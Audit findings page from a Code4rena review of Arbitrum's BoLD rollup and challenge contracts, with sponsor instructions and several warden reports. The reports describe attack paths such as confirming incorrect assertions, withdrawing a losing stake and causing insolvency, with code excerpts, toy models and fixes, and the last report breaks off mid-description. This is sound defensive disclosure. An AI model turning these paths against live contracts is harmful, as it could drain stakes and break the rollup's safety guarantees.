
2024-05-arbitrum-foundation-findings's Introduction

Arbitrum Foundation Audit

Audit findings are submitted to this repo.

Unless otherwise discussed, this repo will be made public after audit completion, sponsor review, judging, and issue mitigation window.

Contributors to this repo: prior to report publication, please review the Agreements & Disclosures issue.

Note that when the repo is public, after all issues are mitigated, your comments will be publicly visible; they may also be included in your C4 audit report.


Review phase

Sponsors have three critical tasks in the audit process: reviewing the two lists of curated issues and, once you have mitigated your findings, sharing those mitigations.

  1. Respond to curated High- and Medium-risk submissions ↓
  2. Respond to curated Low-risk submissions ↓
  3. Share your mitigation of findings (optional) ↓

Note: Be sure to review only issues from the two curated lists, which filter out unsatisfactory issues that don't require your attention.



Types of findings


High- or Medium-risk findings

Wardens submit issues without seeing each other's submissions, so keep in mind that there will always be findings that are duplicates. For all issues labeled 3 (High Risk) or 2 (Medium Risk), these have been pre-sorted for you so that there is only one primary issue open per unique finding. All duplicates have been labeled duplicate, linked to a primary issue, and closed.

QA reports and Gas reports

Any warden submissions in these two categories are submitted as bulk listings of issues and recommendations:

  • QA reports include all low severity findings and governance/centralization risk findings from an individual warden.
  • Gas reports (if applicable) include all gas optimization recommendations from an individual warden.

1. Respond to curated High- and Medium-risk submissions

This curated list will shorten as you work. View the original, longer list →

For each curated High- or Medium-risk finding, please:

1a. Label as one of the following:

  • sponsor confirmed, meaning: "Yes, this is a problem and we intend to fix it."
  • sponsor disputed, meaning either: "We cannot duplicate this issue" or "We disagree that this is an issue at all."
  • sponsor acknowledged, meaning: "Yes, technically the issue is correct, but we are not going to resolve it for xyz reasons."

Add any necessary comments explaining your rationale for your evaluation of the issue.

Note: Adding or changing labels other than those in this list will be automatically reverted by our bot, which will note the change in a comment on the issue.

1b. Weigh in on severity

If you believe a finding is technically correct but disagree with the listed severity, leave a comment indicating your reasoning for the judge to review. For a detailed breakdown of severity criteria and how to estimate risk, please refer to the judging criteria in our documentation.

Judges have the ultimate discretion in determining validity and severity of issues, as well as whether/how issues are considered duplicates. However, sponsor input is a significant criterion.


2. Respond to curated Low-risk submissions

This curated list will shorten as you work. View the original, longer list →

  • Leave a comment for the judge on any reports you consider to be particularly high quality.
  • Add the sponsor disputed label to any reports that you think should be completely disregarded by the judge, i.e. the report contains no valid findings at all.

Once Steps 1 and 2 are complete

When you have finished labeling and responding to findings, drop the C4 team a note in your private Discord backroom channel and let us know you've completed the sponsor review process. At this point, we will pass the repo over to the judge to review your feedback while you work on mitigations.


3. Share your mitigation of findings (Optional)

Once you have confirmed the findings you intend to mitigate, you will want to address them before the audit report is made public. Linking your mitigation PRs to your audit findings enables us to include them in your C4 audit report.

Note: You can work on your mitigations during the judging phase -- or beyond it, if you need more time. We won't publish the final audit report until you give us the OK.

If you are planning a Code4rena mitigation review:

  1. In your own GitHub repo, create a branch based off of the commit you used for your Code4rena audit, then
  2. Create a separate Pull Request for each High or Medium risk C4 audit finding that you confirmed (e.g. one PR for finding H-01, another for H-02, etc.)
  3. Link the PR to the issue that it resolves within your audit findings repo. (If the issue in question has duplicates, please link to your PR from the open/primary issue.)

Most C4 mitigation reviews focus exclusively on reviewing mitigations of High and Medium risk findings. Therefore, QA and Gas mitigations should be done in a separate branch. If you want your mitigation review to include QA or Gas-related PRs, please reach out to C4 staff and let’s chat!

If several findings are inextricably related (e.g. two potential exploits of the same underlying issue, etc.), you may create a single PR for the related findings.

If you aren’t planning a mitigation review

  1. Within a repo in your own GitHub organization, create a pull request for each finding.
  2. Link the PR to the issue that it resolves within your audit findings repo. (If the issue in question has duplicates, please link to your PR from the open/primary issue.)

This will allow for complete transparency in showing the work of mitigating the issues found in the audit.


2024-05-arbitrum-foundation-findings's Issues

Adversary can force honest party to lose stake to challenge their incorrect edges

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L608-L610

Vulnerability details

Impact

Once a correct edge is confirmed, it can no longer be bisected. If a rival reaches the same position, the honest party must create another invalid edge and lose its stake in order to challenge that rival. Otherwise, incorrect edges could be confirmed.

Proof of Concept

According to the contest doc

Attack ideas (where to focus for bugs)
Assuming there is at least one honest participant, no incorrect assertions or edges can be confirmed.

Suppose a correct assertion and an incorrect assertion are having a battle. They now disagree on a length-one edge at level 4. The honest party then creates a layer 0 edge Y at level 5. After some time, Y accumulates enough unrivaled time and gets confirmed. Then the adversary creates another layer 0 edge N at the same position and bisects it. Since Y is already confirmed, it can no longer be bisected.

function bisectEdge(EdgeStore storage store, bytes32 edgeId, bytes32 bisectionHistoryRoot, bytes memory prefixProof)
    internal
    returns (bytes32, EdgeAddedData memory, EdgeAddedData memory)
{
    if (store.edges[edgeId].status != EdgeStatus.Pending) {
        revert EdgeNotPending(edgeId, store.edges[edgeId].status);
    }

If the honest party wishes to rival N, they will need to stake on another invalid edge at level 5, layer 0, which can be continuously bisected. But by doing so, the honest party will lose their stake.

Otherwise, although N cannot be confirmed since Y is already confirmed,

  1. the ancestors of N, and the corresponding assertion, can accumulate unrivaled time, which may help the adversary win the challenge game.
  2. the descendants of N cannot be rivaled either, and they will eventually be confirmed, which breaks the invariant that no incorrect assertions or edges can be confirmed.
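The deadlock above can be sketched as a small Python model. This is a hypothetical structure, not the actual Solidity: it mirrors only the status check at the top of bisectEdge, using illustrative edge names Y and N from the scenario.

```python
# Toy model of the bisectEdge status check: once an edge is Confirmed,
# bisection reverts, so a later rival at the same position cannot be countered.
from enum import Enum

class EdgeStatus(Enum):
    PENDING = 0
    CONFIRMED = 1

class EdgeStore:
    def __init__(self):
        self.edges = {}  # edge id -> EdgeStatus

    def bisect(self, edge_id):
        # mirrors: if (status != EdgeStatus.Pending) revert EdgeNotPending(...)
        if self.edges[edge_id] != EdgeStatus.PENDING:
            raise RuntimeError(f"EdgeNotPending({edge_id})")
        return (edge_id + ".lower", edge_id + ".upper")

store = EdgeStore()
store.edges["Y"] = EdgeStatus.PENDING
store.edges["N"] = EdgeStatus.PENDING

# Y accumulates enough unrivaled time and is confirmed
store.edges["Y"] = EdgeStatus.CONFIRMED

# the adversary's rival N can still be bisected...
store.bisect("N")

# ...but the honest, confirmed edge Y cannot, so N's subtree goes unchallenged
try:
    store.bisect("Y")
except RuntimeError as e:
    print(e)  # EdgeNotPending(Y)
```

The model makes the asymmetry explicit: the Pending-only guard cuts off the honest party's bisection path while leaving the adversary's fresh rival fully playable.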

Tools Used

Manual

Recommended Mitigation Steps

Allow confirmed edges to be bisected.

Assessed type

Context

Users can create assertion with stale `baseStake` amount

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/assertionStakingPool/AssertionStakingPool.sol#L40-L46
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L177-L182
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupCore.sol#L492
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupCore.sol#L69-L70
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupAdminLogic.sol#L223-L226

Vulnerability details

Impact

This breaks core protocol functionality because it leads to a situation where assertions are created by a user whose stake is below the current baseStake amount.

Proof of Concept

Users can create an assertion once the required stake amount is reached by calling AssertionStakingPool::createAssertion(...). The call trace is shown below:

  AssertionStakingPool::createAssertion(...)
   ->RollupUserLogic::newStakeOnNewAssertion(...)
@> -->RollupUserLogic::stakeOnNewAssertion(...)
   ---> RollupCore::createNewAssertion(...)

New assertions build on the configData of their parent assertion, and as such RollupUserLogic::stakeOnNewAssertion(...) implements a check to ensure that the user creating a new assertion is sufficiently staked with respect to the baseStake value at the time the parent assertion was created, as seen on L182 below:

File: RollupUserLogic.sol
163:     function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
164:         public
165:         onlyValidator
166:         whenNotPaused
167:     {
...
175:         require(isStaked(msg.sender), "NOT_STAKED");
176: 
177:         // requiredStake is user supplied, will be verified against configHash later
178:         // the prev's requiredStake is used to make sure all children have the same stake
...
182:@>       require(amountStaked(msg.sender) >= assertion.beforeStateData.configData.requiredStake, "INSUFFICIENT_STAKE");
183: 

However, the problem lies in the validation on L182 of RollupUserLogic::stakeOnNewAssertion(...): the value of baseStake can be updated by the rollup owner. If the baseStake value is increased before a new assertion is created and the current amountStaked(msg.sender) is less than the new baseStake amount, a user can still successfully create an assertion. This breaks core protocol functionality because, despite the system raising the bar for honesty, users are still able to create assertions with less than the current base stake required.

Also, when the new assertion is finally created, its config is set to the new baseStake as shown below (on L492), but this does not prevent the user from creating the assertion with less than the required amount:

File: RollupCore.sol
487:         // state updates
488:         AssertionNode memory newAssertion = AssertionNodeLib.createAssertion(
489:             prevAssertion.firstChildBlock == 0, // assumes block 0 is impossible
490:             RollupLib.configHash({
491:                 wasmModuleRoot: wasmModuleRoot,
492: @>              requiredStake: baseStake,
493:                 challengeManager: address(challengeManager),
494:                 confirmPeriodBlocks: confirmPeriodBlocks,
495:                 nextInboxPosition: uint64(nextInboxPosition)
496:             })
497:         );

POC Summary

  • Assume current baseStake is 100ETH
  • Alice creates assertion: batch 5, blockhash 0xabc with configData.requiredStake = 100ETH
  • Admin calls RollupAdminLogic::setBaseStake(...) to increase baseStake to 120ETH
  • current baseStake = 120 ETH
  • Bob whose amountStaked(msg.sender) = 101ETH creates assertion: batch 10, blockhash 0x123 but his stake is checked to be greater than 100ETH instead of 120ETH
182:@>       require(amountStaked(msg.sender) >= assertion.beforeStateData.configData.requiredStake, "INSUFFICIENT_STAKE");
  • Bob's assertion is successfully created

As you can see, although assets are not at direct risk, the functionality of the protocol is impacted, allowing users to create assertions with less than the minimum stake required by the system (and this could form a hypothetical attack path, because assertions are created using a stale baseStake value).
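The stale check can be condensed into a minimal Python sketch. The function name and values are illustrative; the real check is the Solidity require on L182.

```python
# Sketch of the stale-stake check: the require on L182 compares the staker's
# balance against the parent's requiredStake snapshot, not the current
# baseStake, so an admin increase to baseStake is not enforced on children.
def can_create_assertion(amount_staked, parent_required_stake):
    # mirrors: require(amountStaked(msg.sender) >= configData.requiredStake)
    return amount_staked >= parent_required_stake

base_stake = 100           # baseStake when Alice created the parent assertion
parent_snapshot = base_stake

base_stake = 120           # admin raises baseStake via setBaseStake(...)

bob_stake = 101
# Bob passes the check against the stale snapshot (100) despite baseStake = 120
assert can_create_assertion(bob_stake, parent_snapshot)
# had the check used the current baseStake, Bob would have been rejected
assert not can_create_assertion(bob_stake, base_stake)
```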

Tools Used

Manual review

Recommended Mitigation Steps

Modify the RollupUserLogic::stakeOnNewAssertion(...) as shown below

File: RollupUserLogic.sol
163:     function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
164:         public
165:         onlyValidator
166:         whenNotPaused
167:     {
...

...
182:   -     require(amountStaked(msg.sender) >= assertion.beforeStateData.configData.requiredStake, "INSUFFICIENT_STAKE");
182:   +     require(amountStaked(msg.sender) >= baseStake, "INSUFFICIENT_STAKE");
183: 

Assessed type

Invalid Validation

`checkClaimIdLink` does not check `ClaimId`

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L683-L710

Vulnerability details

Impact

checkClaimIdLink does not check claimId, so a terminal node can inherit timers which it does not deserve.

Proof of Concept

According to BoLD paper section 5.4, suppose A, B are terminal nodes which rival each other (i.e. share the same mutualId), A has children a1, a2, a3, and B has children b1, b2. The five children share the same origin id (which is A and B's mutualId).

We should have
β(A,t) := λ(A,t) + max{β(a1,t), β(a2,t), β(a3,t)}
β(B,t) := λ(B,t) + max{β(b1,t), β(b2,t)}

    function checkClaimIdLink(EdgeStore storage store, bytes32 edgeId, bytes32 claimingEdgeId, uint8 numBigStepLevel)
        private
        view
    {
        // the origin id of an edge should be the mutual id of the edge in the level below
        if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) {
            revert OriginIdMutualIdMismatch(store.edges[edgeId].mutualId(), store.edges[claimingEdgeId].originId);
        }
        // the claiming edge must be exactly one level below
        if (nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) != store.edges[claimingEdgeId].level) {
            revert EdgeLevelInvalid(
                edgeId,
                claimingEdgeId,
                nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel),
                store.edges[claimingEdgeId].level
            );
        }
    }

However, in the implementation, we only check that the originId of the children matches the mutualId of the parent.
We can actually set β(A,t) := λ(A,t) + β(b1,t), which means an edge can inherit a timer from its rival's children!
Even worse, all of a1, a2, a3, b1, b2's descendants at the same level will share the same originId. We can start from a (proved) proof node at level N, use it as claimingEdgeId, and use its level N-1, length-1 ancestor (or the ancestor's rival) as edgeId to set edgeId's timer to type(uint64).max. By repeating this, we can almost instantly confirm any level 0, length-1 edge.

            // when bisecting originId is preserved
            ChallengeEdge memory lowerChild = ChallengeEdgeLib.newChildEdge(
                ce.originId, ce.startHistoryRoot, ce.startHeight, bisectionHistoryRoot, middleHeight, ce.level
            );
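The missing check can be demonstrated with a short Python model. The Edge class and field names are simplified assumptions, not the contract's actual storage layout; only the two quoted checks are reproduced.

```python
# Simplified model of checkClaimIdLink: because rivals share a mutualId, and
# all their children carry that mutualId as originId, the origin-id check
# alone cannot tell A's children apart from B's children.
class Edge:
    def __init__(self, mutual_id, origin_id, level, claim_id=None):
        self.mutual_id = mutual_id
        self.origin_id = origin_id
        self.level = level
        self.claim_id = claim_id

def check_claim_id_link(edge, claiming_edge):
    # mirrors the two checks quoted above; note: no claimId comparison at all
    if edge.mutual_id != claiming_edge.origin_id:
        raise RuntimeError("OriginIdMutualIdMismatch")
    if edge.level + 1 != claiming_edge.level:
        raise RuntimeError("EdgeLevelInvalid")

# rivals A and B share mutualId "M"; their children carry "M" as originId
A = Edge(mutual_id="M", origin_id="root", level=4)
b1 = Edge(mutual_id="M|b1", origin_id="M", level=5, claim_id="B")  # child of B

check_claim_id_link(A, b1)   # passes: A can inherit b1's timer across rivals
assert b1.claim_id != "A"    # the missing require: claimId == edgeId
```

The mitigation below closes exactly this hole by tying the claiming edge back to the specific edge it claims.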

Tools Used

Manual

Recommended Mitigation Steps

require(store.edges[claimingEdgeId].claimId == edgeId);

Assessed type

Context

Withdrawals can be delayed in some conditions

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupCore.sol#L565-L574

Vulnerability details

Impact

Extending the delay of withdrawals

Proof of Concept

The maximum delay for withdrawals from L2 to L1 can be up to approximately 1 week (specifically 6.4 days), primarily due to the challenge period inherent in the optimistic rollup design used by Arbitrum. This challenge period is a security mechanism that allows validators to dispute state assertions before they are finalized on the L1 Ethereum blockchain.

The reason for this delay is rooted in the dispute resolution process. When a state assertion is made on the L2 chain, there is a fixed period during which it can be challenged. This is to ensure that only valid state transitions are confirmed on the L1 chain. If a dispute arises, it must be resolved within this period, and only after the period expires without disputes, or after a dispute is resolved in favor of the assertion, can the withdrawal be finalized on L1.

But withdrawals could be delayed by an additional period of time under specific conditions.

Validators can call newStakeOnNewAssertion and their funds will be taken as stake while the new assertion is created in RollupCore.

The function is as below:

Contract: RollupUserLogic.sol

363:     function newStakeOnNewAssertion( 
364:         uint256 tokenAmount,
365:         AssertionInputs calldata assertion,
366:         bytes32 expectedAssertionHash,
367:         address withdrawalAddress
368:     ) public {
369:         require(withdrawalAddress != address(0), "EMPTY_WITHDRAWAL_ADDRESS");
370:         _newStake(tokenAmount, withdrawalAddress);
371:         stakeOnNewAssertion(assertion, expectedAssertionHash);
372:         /// @dev This is an external call, safe because it's at the end of the function
373:         receiveTokens(tokenAmount); 
374:     }

L:371 calls stakeOnNewAssertion in the same contract.

Contract: RollupUserLogic.sol

173:     function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)

And when the stakers want to withdraw their stakes, the first function to call is as follows:

Contract: RollupUserLogic.sol

240:     /**
241:      * @notice Refund a staker that is currently staked on an assertion that either has a chlid assertion or is the latest confirmed assertion.
242:      */
243:     function returnOldDeposit() external override onlyValidator whenNotPaused {
244:         requireInactiveStaker(msg.sender);
245:         withdrawStaker(msg.sender);
246:     }

So the staker should be inactive, as validated by requireInactiveStaker,
and the funds should be made withdrawable by withdrawStaker.

The logic of the requireInactiveStaker is as below;

Contract: RollupCore.sol

614:     function requireInactiveStaker(address stakerAddress) internal view { 
615:         require(isStaked(stakerAddress), "NOT_STAKED");
616:         // A staker is inactive if
617:         // a) their last staked assertion is the latest confirmed assertion
618:         // b) their last staked assertion have a child
619:         bytes32 lastestAssertion = latestStakedAssertion(stakerAddress);
620:         bool isLatestConfirmed = lastestAssertion == latestConfirmed();
621:         bool haveChild = getAssertionStorage(lastestAssertion).firstChildBlock > 0; 
622:         require(isLatestConfirmed || haveChild, "STAKE_ACTIVE");
623:     } 

As can be seen, the staker's latest assertion should be the latest confirmed one (honest stake),
OR
there should be a child block of the new assertion.
If either of these holds, the staker can initiate a withdrawal of their stake.

This opens a possibility for the attacker to delay the withdrawals.

When a dishonest actor stakes on a new assertion via newStakeOnNewAssertion for a prevAssertion, they should be rivaled by edges.

If the attacker creates a new stake for an assertion (prevAssertion) which was challenged and has children, they would be eligible to withdraw their funds as per the requireInactiveStaker function, L:621.

Since the attacker's latestStakedAssertion already has a child, and is registered as _latestConfirmed in RollupCore.createNewStake as below, they can just stake and create an arbitrary expectedAssertionHash.

Contract: RollupCore.sol

288:     function createNewStake(
289:         address stakerAddress,
290:         uint256 depositAmount,
291:         address withdrawalAddress
292:     ) internal {
293:         uint64 stakerIndex = uint64(_stakerList.length);
294:         _stakerList.push(stakerAddress);
295:         _stakerMap[stakerAddress] = Staker(
296:             depositAmount,
297:  >>         _latestConfirmed, //@audit latestStakedAssertion == _latestConfirmed
298:             stakerIndex,
299:             true,
300:             withdrawalAddress
301:         );
302:         emit UserStakeUpdated(stakerAddress, withdrawalAddress, 0, depositAmount);
303:     }

So once the expectedAssertionHash is challenged (which they can do with another account as well), the attacker need only wait, so as not to waste small stakes in bisections and challenges.
Accordingly, the attacker can front-run confirmEdgeByTime by calling returnOldDeposit.
This will make the attacker's funds withdrawable, and the attacker will succeed in making the withdrawals wait for a period of up to challengePeriod + the first rivaling time.
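The inactivity condition can be modeled compactly in Python. This is a sketch with illustrative arguments, mirroring only the boolean logic of requireInactiveStaker quoted above.

```python
# Toy model of requireInactiveStaker's two conditions: a staker is "inactive"
# (and may withdraw) if their last staked assertion is the latest confirmed
# one, OR if that assertion already has a child.
def is_inactive(last_staked, latest_confirmed, first_child_block):
    is_latest_confirmed = last_staked == latest_confirmed
    have_child = first_child_block > 0   # condition (b) in the code comment
    return is_latest_confirmed or have_child

# the attacker stakes on a prevAssertion that is challenged and already has
# children, so condition (b) holds and the stake is withdrawable at once
assert is_inactive("prevAssertion", "someOtherAssertion", first_child_block=123)

# an honest staker on a fresh, childless, unconfirmed assertion stays locked
assert not is_inactive("newAssertion", "someOtherAssertion", first_child_block=0)
```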

Tools Used

Manual Review

Recommended Mitigation Steps

Let the withdrawal mechanism have a short timelock

Assessed type

Other

Wrong usage of origin checking in sequencer inbox

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/bridge/SequencerInbox.sol#L577
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/bridge/SequencerInbox.sol#L601

Vulnerability details

Impact

Batch posters will not get their gas fees reimbursed.

Proof of Concept

Using Arbitrum's SequencerInbox contract, sequencers (a.k.a. batch posters) submit tx batches through methods like addSequencerL2Batch or addSequencerL2BatchDelayProof.
The sequencers get their gas fees reimbursed based on the length of the data they post, as the following code snippet shows. SequencerInbox.sol#L818-L821

if (calldataLengthPosted > 0 && !isUsingFeeToken) {
    // only report batch poster spendings if chain is using ETH as native currency
    submitBatchSpendingReport(dataHash, seqMessageIndex, block.basefee, 0);
}

However, the addSequencerL2Batch and addSequencerL2BatchDelayProof functions pass false as the isFromOrigin flag, regardless of msg.sender.
In fact, these functions are called by either whitelisted EOA batch posters or the rollup contract, which means that when they are called by whitelisted EOA batch posters, the posters will not get their gas fees reimbursed.
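The reimbursement gating can be sketched in Python. This is a simplified model that assumes calldataLengthPosted is only nonzero for origin calls, per the report above; the function names are illustrative, not the contract's API.

```python
# Simplified model: spending is only reported (and thus reimbursed) when the
# call is flagged as coming from origin and posts nonzero calldata.
def report_batch_spending(is_from_origin, data_len, is_using_fee_token):
    # assumption: calldataLengthPosted is nonzero only for origin calls
    calldata_length_posted = data_len if is_from_origin else 0
    # mirrors: if (calldataLengthPosted > 0 && !isUsingFeeToken)
    return calldata_length_posted > 0 and not is_using_fee_token

# current behavior: addSequencerL2Batch hardcodes isFromOrigin = false,
# so a whitelisted EOA batch poster is never reimbursed
assert not report_batch_spending(False, 1024, False)

# proposed fix: pass msg.sender == tx.origin instead of the literal false
msg_sender, tx_origin = "0xE0A...", "0xE0A..."
assert report_batch_spending(msg_sender == tx_origin, 1024, False)
```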

Tools Used

Manual Review

Recommended Mitigation Steps

It should check if msg.sender is an EOA and pass true if that's the case.

addSequencerL2BatchFromCalldataImpl(
    sequenceNumber,
    data,
    afterDelayedMessagesRead,
    prevMessageCount,
    newMessageCount,
-   false
+   msg.sender == tx.origin
);

Assessed type

Context

The staker that lost the challenge dispute game can still withdraw his stake

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L358

Vulnerability details

Impact

In the current implementation of RollupUserLogic, a new assertion can only be created if a user has staked the requiredStake amount and thereby become a validator. If the previous assertion has two children, a challenge dispute game can be started, and the second child's stake is sent to the loserStakeEscrow. The problem is that this is not reflected in the RollupCore mapping structure, and therefore the user can still request a withdrawal after the dispute finishes.

Proof of Concept

Let's say there are 2 assertions: A and B. The first staker stakes the required amount and suggests a new assertion:

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L175

 require(isStaked(msg.sender), "NOT_STAKED");

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L182

require(amountStaked(msg.sender) >= assertion.beforeStateData.configData.requiredStake, "INSUFFICIENT_STAKE");

And the mapping in RollupCore is also updated:

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L277

_stakerMap[stakerAddress] = Staker(depositAmount, _latestConfirmed, stakerIndex, true, withdrawalAddress);

When the second assertion (B) is created, the process is the same, but the stake is transferred to the loserStakeEscrow as it's the second child:

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L210-216

 if (!getAssertionStorage(newAssertionHash).isFirstChild) {
            // We assume assertion.beforeStateData is valid here as it will be validated in createNewAssertion
            // only 1 of the children can be confirmed and get their stake refunded
            // so we send the other children's stake to the loserStakeEscrow
            // NOTE: if the losing staker have staked more than requiredStake, the excess stake will be stuck
            IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake);
        }

The problem is that once the assertion is confirmed, the second user can still withdraw his stake even if he submitted an incorrect state:

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L358-364

function withdrawStakerFunds() external override whenNotPaused returns (uint256) {
        uint256 amount = withdrawFunds(msg.sender);
        require(amount > 0, "NO_FUNDS_TO_WITHDRAW");
        // This is safe because it occurs after all checks and effects
        IERC20(stakeToken).safeTransfer(msg.sender, amount);
        return amount;
    }

By doing this, he bypasses the protocol requirement that the malicious party's stake be taken in the case of submitting a malicious assertion.
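The double-count can be illustrated with a toy Python accounting model. This is hypothetical bookkeeping, not the actual contracts: it only tracks the contract's token balance against the never-updated per-staker record.

```python
# Toy accounting model: the losing second child's stake is forwarded to
# loserStakeEscrow, but the staker's recorded balance is never zeroed, so a
# later withdrawal pays the same amount again out of other stakers' funds.
class Rollup:
    def __init__(self):
        self.token_balance = 0     # tokens actually held by the rollup contract
        self.staker_balance = {}   # per-staker recorded stake (the mapping)

    def stake(self, who, amount):
        self.token_balance += amount
        self.staker_balance[who] = amount

    def second_child_created(self, required_stake):
        # stake forwarded to loserStakeEscrow; staker_balance left untouched
        self.token_balance -= required_stake

    def withdraw(self, who):
        amount = self.staker_balance.pop(who)
        self.token_balance -= amount
        return amount

r = Rollup()
r.stake("honest", 100)
r.stake("malicious", 100)
r.second_child_created(100)    # malicious stake sent to the escrow
r.withdraw("malicious")        # ...yet the full 100 is withdrawn again

assert r.token_balance == 0            # nothing left for the honest staker
assert r.staker_balance["honest"] == 100
```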

Tools Used

Manual review.

Recommended Mitigation Steps

Set some flag for the second assertion when the first assertion is confirmed.

Assessed type

Other

Adversary can make honest parties unable to retrieve their assertion stakes if the required amount is decreased

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L180

Vulnerability details

Impact

When the required stake (to create new assertions) is updated to a lower amount, an adversary can make the honest party unable to retrieve their assertion stakes.

Proof of Concept

 A -- B -- C -- D(latest confirmed) -- E

Suppose the initial stake amount is 1000 ETH, and until now no invalid assertions have been made (A, B, C, D, E are all valid and made by the same validator). The rollup contract should hold 1000 ETH now.

 A -- B -- C -- D(latest confirmed) -- E
                                    \
                                     \ F(invalid)

Then the admin updates the required stake to 700 ETH, and Alice makes an invalid assertion F. Since its parent D was created before the update, Alice still needs to stake 1000 ETH, and the 1000 ETH is sent to loserStakeEscrow.

        if (!getAssertionStorage(newAssertionHash).isFirstChild) {

            // only 1 of the children can be confirmed and get their stake refunded
            // so we send the other children's stake to the loserStakeEscrow
            IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake);
        }
 A -- B -- C -- D(latest confirmed) -- E
                                    \

                                     \ F -- G

(a) Alice creates F's child, G. Now only 700 ETH of stake is needed. However, as the comment suggests, no refund will be made, since G's ancestor could require more stake.

        // requiredStake is user supplied, will be verified against configHash later
        // the prev's requiredStake is used to make sure all children have the same stake
        // the staker may have more than enough stake, and the entire stake will be locked
        // we cannot do a refund here because the staker may be staker on an unconfirmed ancestor that requires more stake
        // excess stake can be removed by calling reduceDeposit when the staker is inactive
        require(amountStaked(msg.sender) >= assertion.beforeStateData.configData.requiredStake, "INSUFFICIENT_STAKE");

(b) To bypass the limit in (a), Alice asks her friend Bob to make assertion G instead; Bob only needs to stake 700 ETH. The rollup contract currently holds 1700 ETH. Then Alice can withdraw her stake, since she is no longer active (her last staked assertion has a child).

    function requireInactiveStaker(address stakerAddress) internal view {
        require(isStaked(stakerAddress), "NOT_STAKED");
        // A staker is inactive if
        // a) their last staked assertion is the latest confirmed assertion
        // b) their last staked assertion have a child
        bytes32 lastestAssertion = latestStakedAssertion(stakerAddress);
        bool isLatestConfirmed = lastestAssertion == latestConfirmed();
        bool haveChild = getAssertionStorage(lastestAssertion).firstChildBlock > 0;
        require(isLatestConfirmed || haveChild, "STAKE_ACTIVE");
    }

Now the rollup contract holds 700 ETH, which means it is insolvent: the honest validator cannot withdraw their original stake (700 < 1000).
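The balance arithmetic of the scenario can be checked with a quick Python sketch, mirroring the steps above:

```python
# Step-by-step token balance of the rollup contract in the scenario above
balance = 1000             # honest validator's stake (assertions A..E)
balance += 1000            # Alice stakes 1000 ETH to create F (second child)
balance -= 1000            # F's requiredStake is forwarded to loserStakeEscrow
balance += 700             # Bob stakes the reduced 700 ETH to create G
balance -= 1000            # Alice, now "inactive", withdraws her full stake

assert balance == 700      # < 1000 ETH owed to the honest validator: insolvent
```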

Tools Used

Manual

Recommended Mitigation Steps

Ensure the following

  1. A staker is considered inactive only if her last staked assertion is confirmed.
  2. A staker can only stake on her last staked assertion's descendants. (otherwise Alice can switch to the correct branch and withdraw)

Assessed type

Context

Incorrect assertion can be confirmed by abusing the confirmEdgeByOneStepProof function

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L817-L818

Vulnerability details


Impact

An attacker can, in one transaction, create a deep enough level of edges for his own assertion, have the lower part of the commit history confirmed by calling confirmEdgeByOneStepProof, and in doing so have the entire incorrect assertion (one where the upper history commitment is manipulated by the attacker) approved, which is a disaster for the protocol.

Proof of Concept

When edges are created to contest an assertion and we reach level NUM_BIGSTEP_LEVEL + 1, we are in small-step mode, where we can provide a single proof of inclusion to have our entire chain of edges confirmed as the correct one.

On every edge creation, the edges are split, or bisected, with the bisectEdge method:

We get a lower and an upper child edge. In the beginning we have a chain of (last approved assertion) -> (our assertion); by the first bisection we roughly get two child edges:

the lower one Lower_step_1(last approved assertion + middle point)

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L633-L635

and the upper one, Upper_step_1 (middle point to our assertion):

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L646-L648

